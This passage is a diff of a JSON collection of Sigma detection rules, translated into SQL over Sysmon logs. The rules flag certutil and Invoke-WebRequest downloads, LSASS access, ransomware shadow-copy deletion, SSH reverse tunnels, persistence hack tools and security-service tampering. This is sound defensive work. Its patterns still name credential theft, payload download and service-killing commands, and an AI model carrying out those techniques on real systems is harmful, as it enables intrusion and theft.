'%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate use" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" - ], - "filename": "proc_creation_win_pua_frp.yml" - }, - { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" - }, - { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" - }, - { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR 